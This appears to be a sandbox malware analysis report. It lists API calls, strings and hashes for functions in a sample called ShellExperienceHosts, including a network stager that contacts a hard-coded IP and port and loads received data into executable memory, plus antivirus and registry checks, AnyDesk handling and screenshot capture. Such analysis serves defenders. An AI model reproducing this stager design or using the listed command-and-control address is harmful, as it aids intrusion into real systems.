Instruction Fuzzy Hash: 44C1F4B5A10301AFE710EF24EC45F6BB3A8EF94714F184578E9459F281E7B1E984C7A2

Function 032D5F40 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 88
sleepstringsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32(00000000,00000000,2024.12. 8), ref: 032D5F66
GetLastError.KERNEL32 ref: 032D5F6E
Sleep.KERNEL32(000003E8), ref: 032D5F85
CreateMutexW.KERNEL32(00000000,00000000,2024.12. 8), ref: 032D5F90
GetLastError.KERNEL32 ref: 032D5F92
_memset.LIBCMT ref: 032D5FB9
lstrlenW.KERNEL32(?), ref: 032D5FC6
lstrcmpW.KERNEL32(?,032F5328), ref: 032D5FED
Sleep.KERNEL32(000003E8), ref: 032D5FF8
GetModuleHandleW.KERNEL32(00000000), ref: 032D6005
GetConsoleWindow.KERNEL32 ref: 032D600F

Strings

key, xrefs: 032D5FD2
2024.12. 8, xrefs: 032D5F5D, 032D5F87
open, xrefs: 032D5FCD

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: CreateErrorLastMutexSleep$ConsoleHandleModuleWindow_memsetlstrcmplstrlen
String ID: 2024.12. 8$key$open
API String ID: 2922109467-247484233
Opcode ID: fe0c7264c24a10e231593183db17f72544b4a9e25564b83dce9841486b1b9f63
Instruction ID: 7c9ef090f5dc02ce96278a2375bf3d6c489083ace9b5269c007beeccdf42c6cb
Opcode Fuzzy Hash: fe0c7264c24a10e231593183db17f72544b4a9e25564b83dce9841486b1b9f63
Instruction Fuzzy Hash: 0E214876924305DFE310EB64FC49B1EB398EB85721F244838E6009B1C0DBB0E588CBA3

Function 6C9B1860 Relevance: 23.1, APIs: 10, Strings: 3, Instructions: 378
networkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202,?), ref: 6C9B19FF
getaddrinfo.WS2_32(156.251.17.243,18852,00000000,00000000), ref: 6C9B1BEC
socket.WS2_32(?,?,?), ref: 6C9B1C19
connect.WS2_32(00000000,?,?), ref: 6C9B1C34
closesocket.WS2_32 ref: 6C9B1C41
freeaddrinfo.WS2_32(00000000), ref: 6C9B1C58
recv.WS2_32(00822DB8,00020000,00000000), ref: 6C9B1C93
VirtualAlloc.KERNEL32(00000000,00003000,00000040), ref: 6C9B1CDE
WSACleanup.WS2_32 ref: 6C9B1D06
WSACleanup.WS2_32 ref: 6C9B1D25

Strings

156.251.17.243, xrefs: 6C9B19E9, 6C9B19EA, 6C9B1A0F, 6C9B1A3D, 6C9B1A50, 6C9B1A92, 6C9B1A9C, 6C9B1BD6, 6C9B1BEB
, xrefs: 6C9B18A0, 6C9B193B, 6C9B19BC
18852, xrefs: 6C9B1AF5, 6C9B1B04, 6C9B1B17, 6C9B1B59, 6C9B1B63, 6C9B1BC7, 6C9B1BEA

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Cleanup$AllocStartupVirtualclosesocketconnectfreeaddrinfogetaddrinforecvsocket
String ID: $156.251.17.243$18852
API String ID: 2484549806-3526642235
Opcode ID: 7081d86c958eced6ad3eab4682b951a0571d2999f7398564df4c79378988f136
Instruction ID: dad8be0b923de3364af7b9402dea2d72e7417d45a65a6c7b515680612177f129
Opcode Fuzzy Hash: 7081d86c958eced6ad3eab4682b951a0571d2999f7398564df4c79378988f136
Instruction Fuzzy Hash: 8AD13871B01240AFDB148F64D9A47AEBBB6FF47318F240358E455ABB91D3B0D984CB91

Function 6C9B3A00 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 280threadsynchronizationwindowCOMMON

Download Yara Rule

APIs

GetLastInputInfo.USER32 ref: 6C9B3A24
GetTickCount.KERNEL32 ref: 6C9B3A2A
MessageBoxA.USER32 ref: 6C9B3DA0

Part of subcall function 6C9B35E0: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 6C9B3627

Part of subcall function 6C9B2420: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C9B271F

CreateThread.KERNEL32(00000000,00000000,6C9B2D10,AnyDesk.exe,00000000,00000000), ref: 6C9B3C97
CreateThread.KERNEL32(00000000,00000000,6C9B2A10,00000000,00000000,00000000), ref: 6C9B3CA8
WaitForSingleObject.KERNEL32(00000000,00011170), ref: 6C9B3CB6
CloseHandle.KERNEL32(00000000), ref: 6C9B3CC4

Part of subcall function 6C9B3770: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 6C9B37B7

Part of subcall function 6C9B3580: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 6C9B359D

Part of subcall function 6C9B3940: GetModuleHandleA.KERNEL32(?,?), ref: 6C9B3959
Part of subcall function 6C9B3940: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 6C9B3988

Part of subcall function 6C9A72B0: GetTempPathA.KERNEL32(00000104,?,74DF0F10,00000000), ref: 6C9A72F8

Part of subcall function 6C9B2900: GetModuleHandleA.KERNEL32(?,?,00000000), ref: 6C9B2926
Part of subcall function 6C9B2900: FindResourceW.KERNEL32(00000000,004F0043,?), ref: 6C9B2991
Part of subcall function 6C9B2900: LoadResource.KERNEL32(00000000,00000000), ref: 6C9B299F
Part of subcall function 6C9B2900: SizeofResource.KERNEL32(00000000,00000000), ref: 6C9B29A9
Part of subcall function 6C9B2900: LockResource.KERNEL32(00000000), ref: 6C9B29B2

CreateThread.KERNEL32(00000000,00000000,6C9B2A00,00000000,00000000,00000000), ref: 6C9B3D76

Part of subcall function 6C9B19E0: WSAStartup.WS2_32(00000202,?), ref: 6C9B19FF

Strings

AnyDesk.exe, xrefs: 6C9B3C7D, 6C9B3C8D
S, xrefs: 6C9B3A50
yyzyBase.dll, xrefs: 6C9B3D23
IOVA, xrefs: 6C9B3A5C, 6C9B3A60
IOVAS, xrefs: 6C9B3B74, 6C9B3B8A

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Module$FileNameResource$CreateHandleThread$CloseCountFindInfoInputIos_base_dtorLastLoadLockMessageObjectPathSingleSizeofStartupTempTickWaitstd::ios_base::_
String ID: AnyDesk.exe$IOVA$IOVAS$S$yyzyBase.dll
API String ID: 3745978251-1481120110
Opcode ID: 01a7e51504e436cc216231984df5ca69395ea78368a85165f0bd0c8bd07a0e2e
Instruction ID: cabe3c0f1eb7cab972b502b131bc9f4e3d5849f090c1248efd8cc9075bd08b2b
Opcode Fuzzy Hash: 01a7e51504e436cc216231984df5ca69395ea78368a85165f0bd0c8bd07a0e2e
Instruction Fuzzy Hash: CCA1D131208381ABD304CB74CC59BAFB7A5BFD5308F104B1CF599ABA90EB70E5898756

Function 6C9B3000 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 403COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,AnyDesk.exe,?,?), ref: 6C9B3142
SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?), ref: 6C9B315C
GetFileAttributesA.KERNEL32(?,00000004,00000000,.lnk,00000004,AnyDesk.exe,00000001,00000000,6CB66D30,00000001,?,?), ref: 6C9B33E2

Strings

.lnk, xrefs: 6C9B32A5
AnyDesk.exe, xrefs: 6C9B3089, 6C9B3224
te\, xrefs: 6C9B304D
Bule, xrefs: 6C9B3040

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: AttributesFile$FolderPath
String ID: .lnk$AnyDesk.exe$Bule$te\
API String ID: 1382956649-1602760691
Opcode ID: 01ac2aea1e0bb7f8b01a79a725bf63909a7a006eae2611e0beb5d1f22a18f93a
Instruction ID: 133bc10d30493649a57162d04b6500abba0eeca88eab504728c8cd5bc7f3b384
Opcode Fuzzy Hash: 01ac2aea1e0bb7f8b01a79a725bf63909a7a006eae2611e0beb5d1f22a18f93a
Instruction Fuzzy Hash: 88F1B470D042489FEB05CFB8CD94BEEBB75BF45304F248248E059BB691DB74AA85CB51

Function 032D62B6 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 125stringregistryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 032D62CE
wsprintfW.USER32 ref: 032D6336
RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 032D635F
_memset.LIBCMT ref: 032D6376
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 032D63B2
lstrcatW.KERNEL32(03301F10,?), ref: 032D63CE
lstrcatW.KERNEL32(03301F10,032F535C), ref: 032D63DA
RegCloseKey.ADVAPI32(00000000), ref: 032D63E3
lstrlenW.KERNEL32(03301F10,?,5943C5A2,00000AD4,00000000,75BF73E0), ref: 032D6427
lstrcatW.KERNEL32(03301F10,032F53D4,?,5943C5A2,00000AD4,00000000,75BF73E0), ref: 032D643B

Strings

Windows Defender IOfficeAntiVirus implementation , xrefs: 032D63C9, 032D63D5, 032D6422, 032D6436, 032D645A
CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}, xrefs: 032D6330

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: lstrcat$_memset$CloseOpenQueryValuelstrlenwsprintf
String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
API String ID: 1671694837-1583895642
Opcode ID: ff3cb75a5fc56974256b70843b68c5b988fd5ec542befa5360fb2260f29c8296
Instruction ID: f75478e2728224b348ac4182ebd9a21fd70b7d18000aa194c1e4573317b761dd
Opcode Fuzzy Hash: ff3cb75a5fc56974256b70843b68c5b988fd5ec542befa5360fb2260f29c8296
Instruction Fuzzy Hash: A54185F5A00228AFDB24DB54CC95FAEB7B8AB49705F4442C8F30997182DA749A80CF64

Function 6C9B1D50 Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 492COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C9B2317
Concurrency::cancel_current_task.LIBCPMT ref: 6C9B236F
Concurrency::cancel_current_task.LIBCPMT ref: 6C9B2374
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C9B23F7

Strings

IP=, xrefs: 6C9B1D8F
vwer, xrefs: 6C9B1DB8
vi65, xrefs: 6C9B1DAA
156.251.17.243, xrefs: 6C9B214E, 6C9B2180
re41, xrefs: 6C9B1DB1
Port, xrefs: 6C9B1D99
18852, xrefs: 6C9B2214, 6C9B2246

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Concurrency::cancel_current_taskIos_base_dtorstd::ios_base::_
String ID: 156.251.17.243$18852$IP=$Port$re41$vi65$vwer
API String ID: 4106036149-2331335360
Opcode ID: 000509276bfd6f4aa572427647b18b5f6a7246ba2aa7153880fc54ea10ffb18a
Instruction ID: 9d52942002444aabc953c0bdff07cf38516409e7052ba1504bce26043dae9a31
Opcode Fuzzy Hash: 000509276bfd6f4aa572427647b18b5f6a7246ba2aa7153880fc54ea10ffb18a
Instruction Fuzzy Hash: 2A12C371D006489FDB04CFA8C998BEDB7B5FF59304F148299E419ABB91E730EA85CB40

Function 032DC060 Relevance: 19.7, APIs: 13, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000002,?,5943C5A2,?,00000000,?), ref: 032DC09E
GlobalLock.KERNEL32(00000000), ref: 032DC0AA
GlobalUnlock.KERNEL32(00000000), ref: 032DC0BF
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 032DC0D5
EnterCriticalSection.KERNEL32(032FFB64), ref: 032DC113
LeaveCriticalSection.KERNEL32(032FFB64), ref: 032DC124

Part of subcall function 032D9DE0: GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 032D9E04
Part of subcall function 032D9DE0: GdipDisposeImage.GDIPLUS(?), ref: 032D9E18

CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 032DC14C

Part of subcall function 032DA460: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 032DA48D
Part of subcall function 032DA460: _free.LIBCMT ref: 032DA503

GetHGlobalFromStream.OLE32(?,?), ref: 032DC16D
GlobalLock.KERNEL32(?), ref: 032DC177
GlobalFree.KERNEL32(00000000), ref: 032DC18F

Part of subcall function 032D9BA0: DeleteObject.GDI32(?), ref: 032D9BD2
Part of subcall function 032D9BA0: EnterCriticalSection.KERNEL32(032FFB64,?,?,?,032D9B7B), ref: 032D9BE3
Part of subcall function 032D9BA0: EnterCriticalSection.KERNEL32(032FFB64,?,?,?,032D9B7B), ref: 032D9BF8
Part of subcall function 032D9BA0: GdiplusShutdown.GDIPLUS(00000000,?,?,?,032D9B7B), ref: 032D9C04
Part of subcall function 032D9BA0: LeaveCriticalSection.KERNEL32(032FFB64,?,?,?,032D9B7B), ref: 032D9C15
Part of subcall function 032D9BA0: LeaveCriticalSection.KERNEL32(032FFB64,?,?,?,032D9B7B), ref: 032D9C1C

GlobalSize.KERNEL32(00000000), ref: 032DC1A5
GlobalUnlock.KERNEL32(?), ref: 032DC221
GlobalFree.KERNEL32(00000000), ref: 032DC249

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: Global$CriticalSection$Stream$CreateEnterGdipLeave$FreeFromImageLockSizeUnlock$AllocBitmapDeleteDisposeEncodersGdiplusObjectShutdown_free
String ID:
API String ID: 1483550337-0
Opcode ID: 9dd7ebaaf0d5ab563d171ce1d52c0d6f94de2ff56ea715d0e2cfd6e808235750
Instruction ID: 96826213cbff099cfd6c2552b88febccb40e63b643fcccb983fd99c5a96791dc
Opcode Fuzzy Hash: 9dd7ebaaf0d5ab563d171ce1d52c0d6f94de2ff56ea715d0e2cfd6e808235750
Instruction Fuzzy Hash: 52613AB5D10318EFDB10EFE8E88899EBBB8FF49710F108529E515AB245DB709985CF50

Function 032D6490 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 144registrystringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 032D64C2
RegOpenKeyExW.KERNEL32(80000001,Software\Tencent\Plugin\VAS,00000000,000F003F,?), ref: 032D64E2
RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 032D6524
_memset.LIBCMT ref: 032D6560
_memset.LIBCMT ref: 032D658E
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000AD4,75BF73E0), ref: 032D65BA
lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 032D65C3
lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 032D65D5
RegCloseKey.ADVAPI32(?,00000000,00000AD4,75BF73E0), ref: 032D6625
lstrlenW.KERNEL32(?), ref: 032D6635

Strings

Software\Tencent\Plugin\VAS, xrefs: 032D64D8

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: _memsetlstrlen$CloseEnumInfoOpenQuery
String ID: Software\Tencent\Plugin\VAS
API String ID: 2921034913-3343197220
Opcode ID: b19f30696cc5d9cca07ebdae3e0b214c729417a893dae6abca4895ecbcc9e03c
Instruction ID: cb5b2ec0e705011820c571671d6b190701436a81b6e29c7e5ae016df80dbcc46
Opcode Fuzzy Hash: b19f30696cc5d9cca07ebdae3e0b214c729417a893dae6abca4895ecbcc9e03c
Instruction Fuzzy Hash: 0441DCF6A50319ABDB24DB50DD85FEAB37CDB48700F4085E9E309B7081DA70AAC58F94

Function 6C9B2A20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 430sleepprocessfileCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,00000010,00000000,00000000,?,?), ref: 6C9B2A64
DeleteFileA.KERNEL32(?,00000004,00000000,.lnk,00000004,?,00000001,00000000,6CB66D30,00000001,?,?), ref: 6C9B2CB0
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?), ref: 6C9B2D7F
Process32FirstW.KERNEL32(00000000,?), ref: 6C9B2DC1
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 6C9B2DED
Process32NextW.KERNEL32(?,0000022C), ref: 6C9B2EF7
CloseHandle.KERNEL32(00000000,?,?), ref: 6C9B2F06
Sleep.KERNEL32(00000BB8,?,?,?,?,?), ref: 6C9B2F58
CloseHandle.KERNEL32(?,00000000,?,?), ref: 6C9B2F64

Strings

.lnk, xrefs: 6C9B2B9B

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: CloseHandleProcess32$ByteCharCreateDeleteFileFirstFolderMultiNextPathSleepSnapshotToolhelp32Wide
String ID: .lnk
API String ID: 775680180-24824748
Opcode ID: 945343c7f9ed31c8667a2369d715961c641dc9556fcda8458836f7cec90ae8b3
Instruction ID: 8ed42d4cfee7a9da068b6d60df37f220c52c5de21292a3463b83c5cb851b7738
Opcode Fuzzy Hash: 945343c7f9ed31c8667a2369d715961c641dc9556fcda8458836f7cec90ae8b3
Instruction Fuzzy Hash: 1CF13330D04648AFDB04CFA4C898BEEBB75EF46304F248358E454BB691D770EA89CB91

Function 6C9B19E0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 195networkmemoryCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 6C9B19FF
getaddrinfo.WS2_32(156.251.17.243,18852,00000000,00000000), ref: 6C9B1BEC
socket.WS2_32(?,?,?), ref: 6C9B1C19
connect.WS2_32(00000000,?,?), ref: 6C9B1C34
closesocket.WS2_32 ref: 6C9B1C41
freeaddrinfo.WS2_32(00000000), ref: 6C9B1C58
recv.WS2_32(00822DB8,00020000,00000000), ref: 6C9B1C93
VirtualAlloc.KERNEL32(00000000,00003000,00000040), ref: 6C9B1CDE
WSACleanup.WS2_32 ref: 6C9B1D06
WSACleanup.WS2_32 ref: 6C9B1D25

Strings

156.251.17.243, xrefs: 6C9B19E9, 6C9B19EA, 6C9B1A0F, 6C9B1A3D, 6C9B1A50, 6C9B1A92, 6C9B1A9C, 6C9B1BD6, 6C9B1BEB
18852, xrefs: 6C9B1AF5, 6C9B1B04, 6C9B1B17, 6C9B1B59, 6C9B1B63, 6C9B1BC7, 6C9B1BEA

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Cleanup$AllocStartupVirtualclosesocketconnectfreeaddrinfogetaddrinforecvsocket
String ID: 156.251.17.243$18852
API String ID: 2484549806-1308403728
Opcode ID: 3cbfd4c161958c004e770bbc48186d5da7508a0ad55993dee26c5e1106b93c55
Instruction ID: 1ea4b06e7b4c9bc06510b1cf99c04c15da362f6f90d59dfee35e622dbfbac2c6
Opcode Fuzzy Hash: 3cbfd4c161958c004e770bbc48186d5da7508a0ad55993dee26c5e1106b93c55
Instruction Fuzzy Hash: 4C71B571B022409FDB148FA4D9A876AB7B6FF47718F204318F455B7B91D3B0E9858B50

Function 032DA460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 150windowCOMMON

Download Yara Rule

APIs

GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 032DA48D
_malloc.LIBCMT ref: 032DA4D1
_free.LIBCMT ref: 032DA503
GdipGetImageEncoders.GDIPLUS(?,?,00000008), ref: 032DA522
GdipSaveImageToStream.GDIPLUS(00000000,?,?,00000000), ref: 032DA594
GdipDisposeImage.GDIPLUS(00000000), ref: 032DA59F
GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 032DA5C5
GdipDisposeImage.GDIPLUS(00000000), ref: 032DA5DD

Strings

&, xrefs: 032DA579

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: Gdip$Image$DisposeEncoders$BitmapCreateFromSaveSizeStream_free_malloc
String ID: &
API String ID: 2794124522-3042966939
Opcode ID: ad3aa332644f0e5be54e899db3c7ce3edf74e1ef18e69997d2cca5abfe0c8b92
Instruction ID: 296775e8750ae6e001188f4288d9a997ed48d67daafd8ae062b20105593fd055
Opcode Fuzzy Hash: ad3aa332644f0e5be54e899db3c7ce3edf74e1ef18e69997d2cca5abfe0c8b92
Instruction Fuzzy Hash: 875177B6D20215DFDB04DFA4D844EEEB7B8EF48710F148129E916AB250D774E985CBE0

Function 100052B0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 123registrysleepCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 10005382
RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 10005392
RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,1001C6E0,000012A0), ref: 100053B0
RegCloseKey.KERNEL32(?), ref: 100053BB
OpenProcess.KERNEL32(00000400,00000000,?), ref: 1000540F
GetExitCodeProcess.KERNEL32(00000000,?), ref: 1000541B
Sleep.KERNEL32(00000BB8), ref: 10005434

Strings

IpDates_info, xrefs: 1000538C, 100053AA
SOFTWARE, xrefs: 10005378

Memory Dump Source

Source File: 00000003.00000002.3535904141.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3535884612.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535927057.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535947113.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535967860.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535987425.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd

Similarity

API ID: OpenProcessValue$CloseCodeDeleteExitSleep
String ID: IpDates_info$SOFTWARE
API String ID: 864241144-2243437601
Opcode ID: fa41b33889329ce33d54072f6f587efc439d217482355cea30f751f095a89e77
Instruction ID: c351098f3a10662c2abe80f3babca39824d4604c0415f8e3891e9891bb32f169
Opcode Fuzzy Hash: fa41b33889329ce33d54072f6f587efc439d217482355cea30f751f095a89e77
Instruction Fuzzy Hash: 184146316442819FF310CF308C45F6B7BB5FB453C6F994068E581CA186D3B2EA42C7A2

Function 100052D9 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 84registrysleepCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 10005382
RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 10005392
RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,1001C6E0,000012A0), ref: 100053B0
RegCloseKey.KERNEL32(?), ref: 100053BB
OpenProcess.KERNEL32(00000400,00000000,?), ref: 1000540F
GetExitCodeProcess.KERNEL32(00000000,?), ref: 1000541B
Sleep.KERNEL32(00000BB8), ref: 10005434

Strings

IpDates_info, xrefs: 1000538C, 100053AA
SOFTWARE, xrefs: 10005378

Memory Dump Source

Source File: 00000003.00000002.3535904141.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3535884612.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
